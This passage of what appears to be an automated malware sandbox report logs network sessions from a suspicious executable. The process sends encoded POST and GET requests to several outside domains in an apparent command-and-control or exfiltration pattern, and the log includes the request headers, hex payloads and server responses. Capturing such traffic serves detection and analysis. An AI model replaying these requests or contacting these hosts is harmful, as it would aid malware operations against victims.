                                                              Data Raw: 5a 74 77 6c 51 3d 4f 54 42 63 70 6a 72 36 36 52 39 59 49 58 7a 30 4d 2b 68 72 55 58 4f 74 72 31 7a 70 41 2b 35 6c 6c 30 30 79 38 2f 52 46 54 5a 33 64 38 74 47 6b 59 6b 55 6b 41 78 6d 6d 33 62 36 55 78 5a 41 76 63 48 58 6a 47 69 49 65 7a 63 64 46 4b 4e 74 4a 62 2b 77 55 34 42 69 69 4d 39 59 6a 35 67 66 75 78 45 65 6d 74 6c 33 65 44 41 36 73 79 78 57 65 37 6c 46 35 34 65 4c 31 2b 4d 7a 32 56 57 39 39 35 6f 7a 72 78 2b 47 59 4e 6b 68 64 51 53 62 6d 4d 42 32 77 57 32 79 66 75 65 35 55 78 6b 35 51 67 6c 52 78 46 78 53 5a 43 35 62 79 54 43 2b 73 6b 57 6d 69 30 73 73 2b 4d 62 69 76 52 38 36 61 49 35 61 49 62 47 6f 47 66 69 37 35 6d 6e 6c 55 76 73 36 49 61 4b 50 44 50 4f 35 34 35 44 57 43 48 35 43 62 34 71 38 3d
                                                              Data Ascii: ZtwlQ=OTBcpjr66R9YIXz0M+hrUXOtr1zpA+5ll00y8/RFTZ3d8tGkYkUkAxmm3b6UxZAvcHXjGiIezcdFKNtJb+wU4BiiM9Yj5gfuxEemtl3eDA6syxWe7lF54eL1+Mz2VW995ozrx+GYNkhdQSbmMB2wW2yfue5Uxk5QglRxFxSZC5byTC+skWmi0ss+MbivR86aI5aIbGoGfi75mnlUvs6IaKPDPO545DWCH5Cb4q8=


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              15192.168.2.74999113.248.169.48801396C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 12, 2024 15:31:58.717658043 CET1640OUTPOST /ew98/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.sonoscan.org
                                                              Origin: http://www.sonoscan.org
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 1250
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.sonoscan.org/ew98/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Data Raw: 5a 74 77 6c 51 3d 4f 54 42 63 70 6a 72 36 36 52 39 59 49 58 7a 30 4d 2b 68 72 55 58 4f 74 72 31 7a 70 41 2b 35 6c 6c 30 30 79 38 2f 52 46 54 5a 76 64 38 62 79 6b 5a 48 38 6b 42 78 6d 6d 72 4c 36 76 78 5a 42 71 63 47 7a 76 47 69 30 6b 7a 5a 5a 46 4c 6f 35 4a 50 62 63 55 6a 52 69 69 54 74 59 69 6b 77 66 42 78 45 4f 69 74 68 62 65 44 41 36 73 79 79 65 65 79 55 46 35 2b 65 4c 32 35 4d 7a 4d 45 47 39 52 35 6f 37 37 78 2b 43 75 4e 51 56 64 51 79 4c 6d 4f 7a 65 77 56 57 79 52 72 65 34 4a 78 6b 46 50 67 6c 4d 66 46 77 6d 6a 43 35 54 79 54 47 72 55 67 32 6d 62 6d 65 73 65 54 4a 36 68 62 39 36 61 50 70 65 6e 63 58 52 6a 61 43 50 37 6f 47 38 5a 70 5a 33 7a 41 70 48 47 55 74 34 73 36 56 4c 4c 61 34 69 39 72 39 51 4b 2f 2b 4f 59 42 43 72 5a 7a 48 38 47 57 73 32 79 64 77 78 53 64 6d 67 37 4a 4f 38 48 34 37 35 58 38 39 55 2b 75 57 55 54 42 44 33 76 37 44 48 75 6f 68 70 55 5a 4a 69 54 49 6d 7a 34 52 78 7a 2b 30 52 6c 4d 36 5a 52 75 69 35 79 4b 76 2b 2f 64 61 6b 68 66 58 58 76 31 2f 30 38 6a 32 53 69 54 77 75 4f 33 [TRUNCATED]
                                                              Data Ascii: ZtwlQ=OTBcpjr66R9YIXz0M+hrUXOtr1zpA+5ll00y8/RFTZvd8bykZH8kBxmmrL6vxZBqcGzvGi0kzZZFLo5JPbcUjRiiTtYikwfBxEOithbeDA6syyeeyUF5+eL25MzMEG9R5o77x+CuNQVdQyLmOzewVWyRre4JxkFPglMfFwmjC5TyTGrUg2mbmeseTJ6hb96aPpencXRjaCP7oG8ZpZ3zApHGUt4s6VLLa4i9r9QK/+OYBCrZzH8GWs2ydwxSdmg7JO8H475X89U+uWUTBD3v7DHuohpUZJiTImz4Rxz+0RlM6ZRui5yKv+/dakhfXXv1/08j2SiTwuO3NEKXMWG5ENV6NpxIiN5AB8GgwNX/9K8dKe4FZNg6siS7dmLN7UkjWS8lqb+gPS3ge5V1gFNui7qSi0o1iLxB2XWe9e4Y95myuJFA3Ye1K5BcqJVsGuLiPctsvVGv5UhOj2Fz633EnB5jezrVx6GvJcdlkANpNFJ7O7jTF4x6fA1pc6LcmFTmFwbumYbBXcDpltQY4/sj9NrXjSYN8MiBtwN1qvbYJPJYfLHy69RsSHp0ivDwOCsR/2sWnCDHi3ggOs9btK50QMySEEw7bw5z+KtOnl/ooEvjlr63qkAvHGlulwlouLpxSwlBZZqN14TEw8F5JZeavHYuuZVsVXKpnSGhwNIXGDwawvk1TJM0DRQJffN+f7dIt+C7LI/2y161zQsXhmJSkR1XqWrYth2GEVImBAKw+MP9egB3OFA/XGcH+tuMaPo2bj4vkJbanxIWUHuZ+spOdf3Nnaa46RklDd3HbI2CJc1CiDX0z+3hG8boWsObfOmYWkal0qknR3B2T9xXpejt9DBxmOtVqwxZ5JW4ayNt6bX2Svbao3+73qGfI/2qb62U61MDlcz60HggysGslkI7wQOsT6Yn4foiFgDcMxJOwJvXHAfqbkvxrQat9aLia2v8cWN8igjzXCAqQ1KBprRnilk9dmcNqpI5QkLYKjiE3EYlK7 [TRUNCATED]


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              16192.168.2.74999213.248.169.48801396C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 12, 2024 15:32:01.258341074 CET340OUTGET /ew98/?ZtwlQ=DRp8qVXu3DttXwSjdKhWcEeMlFq8C+hogWxSvfZ4d/ir/4GJO1kBPGKjrfOH+I9HTBbwMxIq6OZmA+t0U8cpswvjbO8lhQySl36enx/adUbxmSmc4lJew7Tc5qfeDwhytdyu/8fbB0k7&ZX=G2OXK HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Host: www.sonoscan.org
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Nov 12, 2024 15:32:01.910918951 CET410INHTTP/1.1 200 OK
                                                              Server: openresty
                                                              Date: Tue, 12 Nov 2024 14:32:01 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 270
                                                              Connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 5a 74 77 6c 51 3d 44 52 70 38 71 56 58 75 33 44 74 74 58 77 53 6a 64 4b 68 57 63 45 65 4d 6c 46 71 38 43 2b 68 6f 67 57 78 53 76 66 5a 34 64 2f 69 72 2f 34 47 4a 4f 31 6b 42 50 47 4b 6a 72 66 4f 48 2b 49 39 48 54 42 62 77 4d 78 49 71 36 4f 5a 6d 41 2b 74 30 55 38 63 70 73 77 76 6a 62 4f 38 6c 68 51 79 53 6c 33 36 65 6e 78 2f 61 64 55 62 78 6d 53 6d 63 34 6c 4a 65 77 37 54 63 35 71 66 65 44 77 68 79 74 64 79 75 2f 38 66 62 42 30 6b 37 26 5a 58 3d 47 32 4f 58 4b 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ZtwlQ=DRp8qVXu3DttXwSjdKhWcEeMlFq8C+hogWxSvfZ4d/ir/4GJO1kBPGKjrfOH+I9HTBbwMxIq6OZmA+t0U8cpswvjbO8lhQySl36enx/adUbxmSmc4lJew7Tc5qfeDwhytdyu/8fbB0k7&ZX=G2OXK"}</script></head></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              17192.168.2.74999338.47.232.194801396C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 12, 2024 15:32:07.011147022 CET598OUTPOST /45n6/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.zz67x.top
                                                              Origin: http://www.zz67x.top
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 218
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.zz67x.top/45n6/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Data Raw: 5a 74 77 6c 51 3d 51 68 37 42 79 57 48 32 37 45 61 37 55 6c 52 68 53 2f 4b 45 61 39 6d 56 49 7a 52 70 36 66 62 35 78 34 51 36 4d 63 58 35 71 34 67 58 36 78 43 32 54 30 48 74 5a 56 71 30 61 68 2f 59 4d 61 6c 79 39 34 64 4b 65 34 45 2b 70 2f 4c 72 52 41 4c 72 4e 79 51 4c 73 31 42 41 72 41 34 59 7a 6c 33 59 65 48 4f 69 49 45 48 34 71 78 65 51 4d 38 4b 5a 61 76 66 50 75 61 6a 34 53 52 39 73 58 72 74 62 54 57 62 56 64 78 2f 65 4c 68 69 71 69 78 43 42 47 62 33 52 33 37 69 61 76 58 34 76 71 52 44 4c 63 59 75 41 49 6b 34 2f 67 62 7a 6d 71 53 46 67 63 32 31 73 71 6d 55 4c 48 64 58 4b 2b 41 6e 71 78 66 33 6e 4c 62 34 44 4c 63 33 31 33 6b 46 6d 45 51 3d 3d
                                                              Data Ascii: ZtwlQ=Qh7ByWH27Ea7UlRhS/KEa9mVIzRp6fb5x4Q6McX5q4gX6xC2T0HtZVq0ah/YMaly94dKe4E+p/LrRALrNyQLs1BArA4Yzl3YeHOiIEH4qxeQM8KZavfPuaj4SR9sXrtbTWbVdx/eLhiqixCBGb3R37iavX4vqRDLcYuAIk4/gbzmqSFgc21sqmULHdXK+Anqxf3nLb4DLc313kFmEQ==
                                                              Nov 12, 2024 15:32:07.964400053 CET289INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Tue, 12 Nov 2024 14:32:07 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 146
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              18192.168.2.74999438.47.232.194801396C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 12, 2024 15:32:09.562175035 CET618OUTPOST /45n6/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.zz67x.top
                                                              Origin: http://www.zz67x.top
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 238
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.zz67x.top/45n6/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Data Raw: 5a 74 77 6c 51 3d 51 68 37 42 79 57 48 32 37 45 61 37 56 45 68 68 58 63 69 45 62 64 6d 57 45 54 52 70 76 76 62 31 78 35 73 36 4d 64 53 6b 74 4d 4d 58 2f 6a 61 32 56 41 72 74 65 56 71 30 44 52 2f 5a 49 61 6c 35 39 34 68 43 65 36 51 2b 70 2f 50 72 52 41 62 72 4e 46 4d 49 74 6c 42 65 77 51 34 61 72 46 33 59 65 48 4f 69 49 45 69 76 71 78 47 51 4d 4d 36 5a 61 4f 66 4d 77 4b 6a 35 61 78 39 73 54 72 74 66 54 57 62 6e 64 77 69 37 4c 6c 53 71 69 77 79 42 48 4b 33 57 35 37 69 41 72 58 35 62 36 7a 71 47 47 35 47 6f 4f 46 67 46 6b 5a 7a 32 6d 45 45 43 47 55 35 41 30 33 73 77 44 66 7a 38 70 6d 36 66 7a 65 7a 2f 47 35 4d 69 55 72 53 66 36 32 6b 69 53 70 32 6b 68 33 78 49 2f 77 6a 4d 6d 62 48 66 6b 50 35 75 76 49 38 3d
                                                              Data Ascii: ZtwlQ=Qh7ByWH27Ea7VEhhXciEbdmWETRpvvb1x5s6MdSktMMX/ja2VArteVq0DR/ZIal594hCe6Q+p/PrRAbrNFMItlBewQ4arF3YeHOiIEivqxGQMM6ZaOfMwKj5ax9sTrtfTWbndwi7LlSqiwyBHK3W57iArX5b6zqGG5GoOFgFkZz2mEECGU5A03swDfz8pm6fzez/G5MiUrSf62kiSp2kh3xI/wjMmbHfkP5uvI8=
                                                              Nov 12, 2024 15:32:10.798329115 CET289INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Tue, 12 Nov 2024 14:32:10 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 146
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              19192.168.2.74999538.47.232.194801396C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 12, 2024 15:32:12.108653069 CET1631OUTPOST /45n6/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.zz67x.top
                                                              Origin: http://www.zz67x.top
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 1250
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.zz67x.top/45n6/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Data Raw: 5a 74 77 6c 51 3d 51 68 37 42 79 57 48 32 37 45 61 37 56 45 68 68 58 63 69 45 62 64 6d 57 45 54 52 70 76 76 62 31 78 35 73 36 4d 64 53 6b 74 4e 59 58 2f 77 53 32 54 58 2f 74 66 56 71 30 4c 78 2f 45 49 61 6c 6f 39 34 35 47 65 36 4d 41 70 39 48 72 44 7a 6a 72 4c 77 34 49 6e 6c 42 65 35 77 34 5a 7a 6c 33 33 65 47 69 75 49 45 79 76 71 78 47 51 4d 50 69 5a 54 2f 66 4d 33 36 6a 34 53 52 38 6a 58 72 74 37 54 53 33 33 64 77 58 4f 49 57 61 71 69 51 69 42 42 38 72 57 78 37 69 47 73 58 35 44 36 7a 33 47 47 35 61 6b 4f 46 56 69 6b 5a 37 32 69 6a 35 35 61 33 31 35 68 48 31 76 4e 75 44 36 6e 6d 53 44 71 6f 6e 39 4e 59 6f 72 5a 59 47 34 32 46 31 71 48 2b 36 68 7a 78 56 4b 7a 30 44 6d 6d 2b 72 56 31 66 64 73 31 64 77 43 41 6e 4d 39 5a 54 67 42 31 41 55 63 4a 69 76 42 6e 5a 65 6f 45 64 42 74 4e 33 47 4c 37 61 4f 39 4e 50 4c 44 4d 4a 7a 35 61 66 71 57 66 7a 6a 44 63 45 30 65 65 63 62 7a 61 58 34 4b 78 4e 58 58 66 6b 64 55 52 4b 59 41 58 43 63 51 4d 6d 33 5a 31 56 31 77 59 53 36 32 7a 78 32 64 71 76 6f 37 6b 78 6d 79 [TRUNCATED]
                                                              Data Ascii: ZtwlQ=Qh7ByWH27Ea7VEhhXciEbdmWETRpvvb1x5s6MdSktNYX/wS2TX/tfVq0Lx/EIalo945Ge6MAp9HrDzjrLw4InlBe5w4Zzl33eGiuIEyvqxGQMPiZT/fM36j4SR8jXrt7TS33dwXOIWaqiQiBB8rWx7iGsX5D6z3GG5akOFVikZ72ij55a315hH1vNuD6nmSDqon9NYorZYG42F1qH+6hzxVKz0Dmm+rV1fds1dwCAnM9ZTgB1AUcJivBnZeoEdBtN3GL7aO9NPLDMJz5afqWfzjDcE0eecbzaX4KxNXXfkdURKYAXCcQMm3Z1V1wYS62zx2dqvo7kxmykOGpZPXJ6S5WYAUGlI/RdeIobgKsNDTGXZvT2JTgXPX4GdoQ13lW4yvOXnn44rZXyxl8JnuwTJcU27KvbwFLX7cljIj1lfXevqKiSRanFDyelqXhejm8i6G2rBDaax1lvqpRuR/vrp1zUw7hjqaik9uds/mEJagsxOkyHmOC7gVRKOH6khmgFa6m92MG0kjSlJifDSXmFf58nFxOJWX17QTCCJv0sIPx97ZoAOaKEqSpzSpAuItvT+zJ3Fm4LscMIwlQki6nCEcPzyLairCYTl/ovFjAG11Vtbd4yGuNtKHA8eegW8i60fCIDtzBXu0fM+cX0iBYJCGbXxpRavB1U7gJLAtKtMHWdk69kJ61SDcOLQA4LTgz2bbxt5qGB/2z3+hIMFu6MQUVvuCDaSx7GlZ+3H6g7KqrXegj51XRCSDKx1VVUqnDqNuXQp+rS4/I8mR4Aq2RR15eNltXIncBFxw+ULetRqC0ZPaWpJ5M7rT3uSD+ZNv/IHK8zNVOWeDWwCu8QEn/FOdjFt2K7d6xUDO90cepSEOKI67X7McQlu7ARuZnmXZKwA3J/nqdFDQLTgh5I6xoV6kExGgwKlmQTaw2rJUl4E//2vQW7u/TpPSqxAIGy6TbhN+VPPsLUek6uCMuAvXAjetqTTZUyOAMEU2w6nnE2lCmm9 [TRUNCATED]
                                                              Nov 12, 2024 15:32:13.051506042 CET289INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Tue, 12 Nov 2024 14:32:12 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 146
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              20192.168.2.74999638.47.232.194801396C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 12, 2024 15:32:14.653965950 CET337OUTGET /45n6/?ZX=G2OXK&ZtwlQ=djThxhCXsVTaW29IStONWe6xHREL7sfT17x4FrONtsEdvh3lUnzIZnalbCLaN+V127dkaLgcrePaRgDcNiYyv3h68wNOsFyKAz31clbs/jf4McL8QfrvpP2aRWMeaeVzG2yiHAO/Jkyn HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Host: www.zz67x.top
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Nov 12, 2024 15:32:15.630985975 CET289INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Tue, 12 Nov 2024 14:32:15 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 146
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              21192.168.2.749997167.172.133.32801396C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 12, 2024 15:32:20.857873917 CET613OUTPOST /jlqg/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.omnibizlux.biz
                                                              Origin: http://www.omnibizlux.biz
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 218
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.omnibizlux.biz/jlqg/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Data Raw: 5a 74 77 6c 51 3d 78 62 59 4f 45 44 33 58 75 76 49 77 65 38 41 5a 66 47 66 6f 6e 68 5a 63 43 34 6b 34 54 39 73 4a 33 34 56 45 67 41 56 51 2f 58 71 79 64 63 56 6a 6f 4b 52 67 45 72 46 70 31 2f 53 68 62 37 68 4a 50 4a 54 42 68 68 2b 2f 56 41 63 6d 71 31 46 43 6c 62 4e 77 74 36 2b 56 70 47 48 56 57 76 7a 72 53 59 45 37 4e 44 6f 43 6e 43 77 37 73 77 70 5a 63 68 70 45 6b 7a 77 61 67 77 7a 4c 43 56 6b 70 49 72 61 4d 36 31 79 2f 74 31 5a 39 48 67 78 6b 6f 42 73 4b 2f 75 66 57 74 37 76 51 34 47 2b 68 71 50 56 75 6b 50 4a 5a 63 45 53 53 77 67 46 5a 4c 37 6f 68 6c 57 43 7a 43 6e 75 73 47 6f 78 70 4d 58 53 51 64 66 76 73 58 69 4b 4e 30 30 78 62 49 67 3d 3d
                                                              Data Ascii: ZtwlQ=xbYOED3XuvIwe8AZfGfonhZcC4k4T9sJ34VEgAVQ/XqydcVjoKRgErFp1/Shb7hJPJTBhh+/VAcmq1FClbNwt6+VpGHVWvzrSYE7NDoCnCw7swpZchpEkzwagwzLCVkpIraM61y/t1Z9HgxkoBsK/ufWt7vQ4G+hqPVukPJZcESSwgFZL7ohlWCzCnusGoxpMXSQdfvsXiKN00xbIg==
                                                              Nov 12, 2024 15:32:21.517307043 CET306INHTTP/1.1 404 Not Found
                                                              Server: nginx/1.26.1
                                                              Date: Tue, 12 Nov 2024 14:32:21 GMT
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Content-Encoding: gzip
                                                              Data Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 46 66 7a 86 c8 4a f4 61 86 ea 43 1d 04 00 bd 97 f5 cc 99 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzFfzJaC0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              22192.168.2.749998167.172.133.32801396C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 12, 2024 15:32:23.402628899 CET633OUTPOST /jlqg/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.omnibizlux.biz
                                                              Origin: http://www.omnibizlux.biz
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 238
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.omnibizlux.biz/jlqg/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Data Raw: 5a 74 77 6c 51 3d 78 62 59 4f 45 44 33 58 75 76 49 77 66 5a 51 5a 5a 6c 48 6f 68 42 5a 62 4a 59 6b 34 61 64 73 4e 33 34 4a 45 67 44 5a 2b 2f 46 4f 79 63 39 6c 6a 70 4f 6c 67 48 72 46 70 39 66 53 6b 55 62 68 34 50 49 76 4a 68 68 53 2f 56 45 4d 6d 71 31 56 43 6b 70 6c 33 69 4b 2b 74 69 6d 48 62 53 76 7a 72 53 59 45 37 4e 41 55 73 6e 43 34 37 73 67 5a 5a 64 44 42 44 71 54 77 5a 74 67 7a 4c 47 56 6c 75 49 72 62 62 36 30 75 47 74 32 68 39 48 6b 31 6b 6f 51 73 4c 6b 65 66 55 77 72 75 56 77 31 66 59 67 76 52 6d 72 35 5a 6a 57 33 4b 54 34 32 45 37 52 5a 6b 4e 37 48 36 49 47 6c 4b 61 52 4f 73 63 4f 57 57 49 51 39 62 4e 49 56 76 6e 35 6d 51 66 65 65 56 4e 54 44 4d 67 37 59 52 6b 4f 6c 39 68 43 4a 41 54 42 75 77 3d
                                                              Data Ascii: ZtwlQ=xbYOED3XuvIwfZQZZlHohBZbJYk4adsN34JEgDZ+/FOyc9ljpOlgHrFp9fSkUbh4PIvJhhS/VEMmq1VCkpl3iK+timHbSvzrSYE7NAUsnC47sgZZdDBDqTwZtgzLGVluIrbb60uGt2h9Hk1koQsLkefUwruVw1fYgvRmr5ZjW3KT42E7RZkN7H6IGlKaROscOWWIQ9bNIVvn5mQfeeVNTDMg7YRkOl9hCJATBuw=
                                                              Nov 12, 2024 15:32:24.079112053 CET306INHTTP/1.1 404 Not Found
                                                              Server: nginx/1.26.1
                                                              Date: Tue, 12 Nov 2024 14:32:23 GMT
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Content-Encoding: gzip
